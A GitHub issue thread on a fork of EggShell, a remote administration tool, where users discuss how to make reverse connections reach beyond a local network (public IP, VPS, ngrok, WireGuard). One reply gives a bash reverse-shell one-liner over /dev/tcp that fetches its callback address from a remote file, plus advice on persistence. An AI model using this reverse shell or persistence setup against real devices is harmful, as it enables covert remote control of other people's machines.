rpwnage / EggShell-Community-Fork

Community fork of the eggshell iOS/macOS/Linux Remote Administration Tool
GNU General Public License v2.0

LHost parameter #14

Open AstroOrbis opened 3 years ago

AstroOrbis commented 3 years ago

What would I put in the LHost section? Anything with 192.168 is local, and sending this over to a device not connected to the same network as me would be useless... halp lmao

acheong08 commented 3 years ago

If you have port forwarding, put your public IP. If you're just pentesting at home, use your local IP. Else, you can also host a VPS and run eggshell there.

AstroOrbis commented 3 years ago

I'm stupid, wats a VPS... sry its late and I'm tired kek

acheong08 commented 3 years ago

Virtual private server. Offered by DigitalOcean and many more. It's a server with SSH access and a public facing IP. I own one on DigitalOcean to host my website, IRC, VPN, and DNS resolver. It's quite multi-purpose.

acheong08 commented 3 years ago

If you have a student email address, you can get up to $100 free credit on DigitalOcean for 12 months free by getting the GitHub Student Developer Pack.

rpwnage commented 3 years ago

Well, you could try ngrok to allow connections outside of your local network. Didn't try it yet but it should work 🙂

AstroOrbis commented 3 years ago

So I put in the Ngrok address for the LHost?

acheong08 commented 3 years ago

That would also work. Tried it today. However, ngrok doesn't work with the persistence module (for obvious and unfixable reasons unless you pay for the premium).

AstroOrbis commented 3 years ago

What if there was a new persistence module that got the IP from a server that you run, then connects normally? And would port forwarding also work?

acheong08 commented 3 years ago

Yes. In bash, that would be:

bash &> /dev/tcp/$(curl http://example.com/ip.txt)/4444 0>&1

Pastebin would be useful for this.

acheong08 commented 3 years ago

I'm not sure, but if you have your own domain name, a CNAME record might work.

acheong08 commented 3 years ago

I am currently using a server with WireGuard and port forwarding for getting reverse connections. Would have to edit the persistence .plist to do that though.